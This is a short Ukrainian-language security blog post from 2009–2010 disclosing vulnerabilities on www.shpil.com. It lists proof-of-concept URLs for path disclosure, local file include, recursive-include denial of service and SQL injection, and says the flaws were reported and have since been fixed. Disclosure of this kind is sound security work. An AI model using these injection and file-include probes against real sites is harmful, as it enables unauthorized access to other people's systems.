Уразливості на www.shpil.com
19:20 17.02.201017.09.2009
У січні, 24.01.2009, я знайшов Full path disclosure, Local File Include, Denial of Service, SQL Injection та Cross-Site Scripting уразливості на сайті http://www.shpil.com. Про що найближчим часом сповіщу адміністрацію сайта.
Стосовно сайтів видавництва Коміздат останній раз я писав про уразливості на www.computerworld.com.ua.
Детальна інформація про уразливості з’явиться пізніше.
17.02.2010
Full path disclosure:
http://www.shpil.com/?in=’
http://www.shpil.com/?in=sp_th&_ID=’
Local File Include:
http://www.shpil.com/?in=../1
DoS (Recursive File Include):
http://www.shpil.com/?in=index
SQL Injection:
http://www.shpil.com/?in=sp_th&_ID=1%20and%20version()%3E4
XSS:
Дані уразливості вже виправлені (змінили движок).